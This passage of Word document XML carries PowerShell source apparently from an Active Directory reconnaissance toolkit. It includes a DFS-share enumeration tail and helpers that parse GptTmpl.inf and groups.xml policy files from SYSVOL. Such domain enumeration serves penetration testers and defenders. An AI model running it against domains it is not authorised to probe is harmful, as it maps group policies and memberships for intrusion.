    <w:p w14:paraId="502CC438" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DFSshares += Get-DFSshareV2 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60707C26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5657958B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7910EA3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $DFSshares | Sort-Object -Property ("RemoteServerName","Name") -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F6D97D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51025438" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6165D0F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A0D9D46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1757333D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07557678" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># GPO related functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AE7BC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CEBB15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC0D56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1FC88DFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BFBCC0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-GptTmpl {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CFB77C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBEE2B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420B878D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F5C11C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Helper to parse a GptTmpl.inf policy file path into a custom object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21D150" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E67A662" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GptTmplPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966B98C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44E8EF53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The GptTmpl.inf file path name to parse. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37321739" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17B1B7E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E8FCBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60341CF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Mount the target GptTmpl folder path as a temporary PSDrive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4764A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FED345C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE7128" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7147ED29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6231BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="251ACC3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Parse the default domain policy .inf for dev.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101A435D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96FC48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D594A84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CAD88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E9EC62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E4B5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DE781" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GptTmplPath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E72CF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26B49ED4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DED19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BDE03A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FEC8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C32FB78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($UsePSDrive) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE61C69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're PSDrives, create a temporary mount point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DCBE9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Parts = $GptTmplPath.split('\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789580A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FolderPath = $Parts[0..($Parts.length-2)] -join '\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B034AA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FilePath = $Parts[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2853CC66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D535D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B7ED883" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Mounting path $GptTmplPath using a temp PSDrive at $RandDrive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C44F2E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C277589" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4FF02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath  -ErrorAction Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647BB7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F029A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B1947" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Error mounting path $GptTmplPath : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D858D50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B0BB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4CE9D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DB36A5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # so we can cd/dir the new drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270477C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetGptTmplPath = $RandDrive + ":\" + $FilePath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71731E9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686AAF19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCC3D4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetGptTmplPath = $GptTmplPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3958B067" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A743BCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78272640" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Write-Verbose "GptTmplPath: $GptTmplPath"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F34BFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60B690DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E015FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Parsing $TargetGptTmplPath"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8BBD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetGptTmplPath | Get-IniContent -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630A1525" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA0C94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C213EF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error parsing $TargetGptTmplPath : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72796238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B9EC0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38A1127A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($UsePSDrive -and $RandDrive) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164E99CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Removing temp PSDrive $RandDrive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F3240" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E7A6DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F8DEB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17853DC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D9F6AE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17D44269" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-GroupsXML {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4504759C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5720B5BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE90C39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3386A426" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Helper to parse a groups.xml file path into a custom object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F541D8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68FE523B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupsXMLpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5A17C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1030FC26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The groups.xml file path name to parse. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4245F913" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11711B62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B342B09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B63C718" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Mount the target groups.xml folder path as a temporary PSDrive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9C0DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C862EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33882857" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09807052" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F619DAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEAF645" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F6C202" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupsXMLPath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D93D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="539D0255" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F5A4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE863F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214FB75A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A39A927" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if($UsePSDrive) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611AEC25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're PSDrives, create a temporary mount point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E2435F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Parts = $GroupsXMLPath.split('\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F7DFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FolderPath = $Parts[0..($Parts.length-2)] -join '\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D10AA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FilePath = $Parts[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F92AE45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09343B60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33D68F18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Mounting path $GroupsXMLPath using a temp PSDrive at $RandDrive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493C4E8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="299E7853" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7AE0B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath  -ErrorAction Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680BC124" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD7B2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AC21E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Error mounting path $GroupsXMLPath : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5B3CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF43BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B06B76D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BB7B48E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # so we can cd/dir the new drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41966AE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetGroupsXMLPath = $RandDrive + ":\" + $FilePath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FE60D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25795B2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAB16F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetGroupsXMLPath = $GroupsXMLPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C4710" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5F0208" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
